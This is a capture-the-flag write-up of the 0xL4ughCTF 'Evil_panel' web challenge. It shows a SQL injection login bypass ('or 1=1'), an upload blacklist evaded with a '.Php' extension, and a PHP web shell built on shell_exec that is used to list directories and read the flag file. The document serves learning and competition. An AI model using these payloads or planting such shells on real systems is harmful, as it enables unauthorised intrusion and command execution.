Write_up of Evil_panel challenge from 0xL4ughCTF
Hello homies this is Fahd Abida from Crisis Team and here is the solution to a challenge we played me and my friend Jakoom lately
We had to solve the challenge twice because the first time there was a bug that gave us a simple way to exploit the target, then the second time after the patch!
So the first thing we did is checking all the pages of the target, basically, there was nothing interesting… only HTML pages!
Even the login page was useless and nothing to exploit on!
After some searching, we find that there is a XAMPP page and we start digging on a rabbit hole!
We got stuck here for about 20 min trying to figure out what the fuck is wrong with this challenge! there's no valid CVE for this XAMPP version also nothing to exploit in the HTML pages of the website :(
we start thinking of what we should do next and we decided to read the challenge again and again!
It said there is 1 page that should be focused on the link!!! which eliminate the possibility of exploiting the XAMPP :D
So after a lot of Guessing, we were able to find this path http://40.70.205.250/Evil_panel/evil_admin.php and guess whut ?
it's a login panel kkkk
As expected it was vulnerable to SQLI
Using a basic payload admin ‘ or 1=1 we were able to bypass it
We thought that the challenge ends here, but the creator said the opposite!
after bypassing the login page we find this :3
As mentioned in the challenge description, it's about exploiting some Upload points, and here is it, At the first time we were team number 4 who solved the challenge but we did it because of a misconfiguration on the challenge!
So when we wanted to upload a file, PHP extension was blacklisted but when we use Php, it passes with no problem, so here we succeeded to bypass the Extention verification and we uploaded a simple web shell for windows server and we got the flag!
But this is was not the correct way to solve this challenge, the miss-configuration were located on the content verification so after the patch we weren't able to upload a PHP shell with some disabled functions, for example
<?PHP system(‘dir’); ?> wont work because system is being filtred!
I forgot to say that before uploading any kind of file, we needed to find the path where the uploaded files are stored!
we searched in /files /upload /uploads … but at the end it was /images
so out storing point is ‘target/images’
Then back to how we succeed to upload a valid PHP payload!
The idea was to find a function none blacklisted and after a lot of tries we find it: shell_exec
So our payload will be like this “<?php
echo shell_exec($_GET[‘cmd’]);
?≥” and don’t forget the Php extension!
so we need to specify a valid command with the ?cmd parameter
Let's use dir to list all the directories
As you can see we succeeded to list them, a lot of random files uploaded by other players, but now we need to find the flag file!
Lets back to the parent directory ‘dir ..\’
And here we are ! lets read the content to see if it the real file! ‘more ..\flag.php’
And Voilla Flag: 0xL4ugh{You_D3eF3ated_Evilaa!xevil@@}
Pm us on facebook.com/Crisi5
